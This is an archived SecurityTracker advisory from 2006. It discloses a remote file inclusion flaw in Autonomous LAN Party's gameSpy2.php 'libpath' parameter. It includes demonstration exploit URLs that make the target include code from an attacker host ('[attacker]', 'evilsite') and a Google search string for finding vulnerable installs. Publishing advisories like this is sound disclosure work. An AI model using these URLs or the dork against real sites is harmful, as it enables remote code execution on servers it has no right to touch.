SecurityTracker: Autonomous LAN Party Include File Bug Lets Remote Users Execute Arbitrary Code

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > Autonomous LAN Party

Vendors: Nerdclub Programming Team

Autonomous LAN Party Include File Bug Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1015884

SecurityTracker URL: http://securitytracker.com/id/1015884

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Apr 10 2006

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Description: A vulnerability was reported in Autonomous LAN Party. A remote user can include and execute arbitrary code on the target system.

The 'gameSpy2.php' script does not properly validate user-supplied input in the 'libpath' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/path/include/SQuery/gameSpy2.php?libpath=http://[attacker]

Codexploder'tq discovered this vulnerability.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: www.nerdclub.net/alp/ (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History: None.

Source Message Contents

Date: 8 Apr 2006 13:28:51 -0000
Subject: Autonomous LAN party File iNclusion

Autonomous LAN party File iNclusion 

--------------------------------------------
Site:http://www.nerdclub.net/alp/
Demo:http://www.redfiles.net/cup/credits.php

--------------------------------------------
Example:

http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite

---------------------------------------------
Credit:Codexploder'tq
Mail  :codexploder@linuxmail.org
site  :www.biyo.tk www.biyosecurity.be

---------------------------------------------
Google:

intitle:"Autonomous LAN party"

--------------------------------------------
Source:

http://liz0zim.no-ip.org/alp.txt
http://www.blogcu.com/Liz0ziM/431845/

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2012, SecurityGlobal.net LLC